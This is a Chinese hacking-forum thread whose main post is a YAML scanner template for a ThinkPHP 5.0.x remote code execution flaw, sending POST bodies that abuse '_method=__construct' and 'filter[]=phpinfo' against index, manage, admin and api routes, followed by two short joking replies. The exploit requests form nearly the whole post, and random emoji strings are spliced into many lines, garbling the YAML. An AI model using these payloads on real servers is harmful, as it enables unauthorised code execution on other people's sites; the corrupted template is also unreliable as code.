世情薄,人情恶,两送黄昏花易落。晓风残,泪痕残。欲笺心事,独倚斜阑。难,难,难! 收藏本站
登陆 / 注册 搜索

阅读:2.3K   回复: 2

thinkphp-5010-rce漏洞

[复制链接]
黑客小王 「龙战于野」 2024-8-3 00:23 来自手机 |显示全部楼层

我是黑客阿尔法

漏洞文件后缀名是.yaml
id: thinkphp-5010-rce

info:
  name: ThinkPHP 5.0.10 RCE

👄🚠🍞⁉🐋‌

  author: zan8in
  severity: critical
  description: ThinkPHP <= 5.0.13
  reference:
    - https://github.com/Lotus6/ThinkphpGUI/blob/main/ThinkphpGUI/src/main/java/exploit/
💪🔥🍞📶🐅‎
rules:
  r0:
    request:
      method: POST
🤛🏦🥄♻🦖‎      path: /?s=index
      body: |
        s=-1&_method=__construct&method=post&filter[]=phpinfo
    expression: 状态码 == 200 && 是否包含(响应内容,'PHP Extension') && 是否包含(响应内容,'PHP Version') && 正则匹配('>PHP Version <\/td><td class="v">([0-9.]+)',响应内容)
  r1:

👌🛑🧊🆒🐞‍

    request:
      method: POST
      path: /?s=manage
      body: |
        s=-1&_method=__construct&method=post&filter[]=phpinfo👴‍🎩🎺😉👌
    expression: 状态码 == 200 && 是否包含(响应内容,'PHP Extension') && 是否包含(响应内容,'PHP Version') && 正则匹配('>PHP Version <\/td><td class="v">([0-9.]+)',响应内容)
  r2:
    request:
      method: POST
      path: /?s=admin👨‍⚕️‍💄🖌😫🙌
      body: |
        s=-1&_method=__construct&method=post&filter[]=phpinfo
    expression: 状态码 == 200 && 是否包含(响应内容,'PHP Extension') && 是否包含(响应内容,'PHP Version') && 正则匹配('>PHP Version <\/td><td class="v">([0-9.]+)',响应内容)
  r3:
    request:

🧑‍⚕️‎👠📥😴👂


      method: POST
      path: /?s=api
      body: |
        s=-1&_method=__construct&method=post&filter[]=phpinfo
    expression: 状态码 == 200 && 是否包含(响应内容,'PHP Extension') && 是否包含(响应内容,'PHP Version') && 正则匹配('>PHP Version <\/td><td class="v">([0-9.]+)',响应内容)

👴‎💄⌨😊👃


  r4:
    request:
      method: POST
      path: /?s=index
      body: |

👩‎🛍🗑🤖👃


        _method=__construct&method=get&filter[]=phpinfo&get[]=-1
    expression: 状态码 == 200 && 是否包含(响应内容,'PHP Extension') && 是否包含(响应内容,'PHP Version') && 正则匹配('>PHP Version <\/td><td class="v">([0-9.]+)',响应内容)
  r5:
    request:
      method: POST
👊🚗🥣🦠‌      path: /?s=manage
      body: |
        _method=__construct&method=get&filter[]=phpinfo&get[]=-1
    expression: 状态码 == 200 && 是否包含(响应内容,'PHP Extension') && 是否包含(响应内容,'PHP Version') && 正则匹配('>PHP Version <\/td><td class="v">([0-9.]+)',响应内容)
  r6:
✋🚗🍌🚷‎    request:
      method: POST
      path: /?s=admin
      body: |
        _method=__construct&method=get&filter[]=phpinfo&get[]=-1👨‍⚕️‌🧦🎷💩🖕
    expression: 状态码 == 200 && 是否包含(响应内容,'PHP Extension') && 是否包含(响应内容,'PHP Version') && 正则匹配('>PHP Version <\/td><td class="v">([0-9.]+)',响应内容)
  r7:
    request:
      method: POST
      path: /?s=api👩‍✈️‎👚⚔😚
      body: |
        _method=__construct&method=get&filter[]=phpinfo&get[]=-1
    expression: 状态码 == 200 && 是否包含(响应内容,'PHP Extension') && 是否包含(响应内容,'PHP Version') && 正则匹配('>PHP Version <\/td><td class="v">([0-9.]+)',响应内容)
expression: r0() || r1() || r2() || r3() || r4() || r5() || r6()|| r7()
上一篇
下一篇
thinkphp-5010-rce漏洞 Screenshot_2024-08-03-00-21-24-626_bin.mt.plus.jpg
帖子热度 2292 ℃


若蕊mm丶 「初入古黑」 2024-8-3 00:30 |显示全部楼层

这个用户很懒,还没有填写自我介绍呢~

楼主‍‍,你知道得太多了😏
    

洛奇呀 「初入古黑」 2025-6-1 18:17 |显示全部楼层

这个用户很懒,还没有填写自我介绍呢~

求拜师
    

返回列表 发新帖
高级模式
您需要登录后才可以回帖 登录 | 免费注册  

本版积分规则

关于本站大事记小黑屋 网站地图

GMT+8, 2025-9-3 07:04 , Processed in 0.023020 second(s), 18 queries , Redis On.

Copyright © 2015-2025古黑论

Powered by Discuz! X3.4Comsenz Inc.

快速回复 返回列表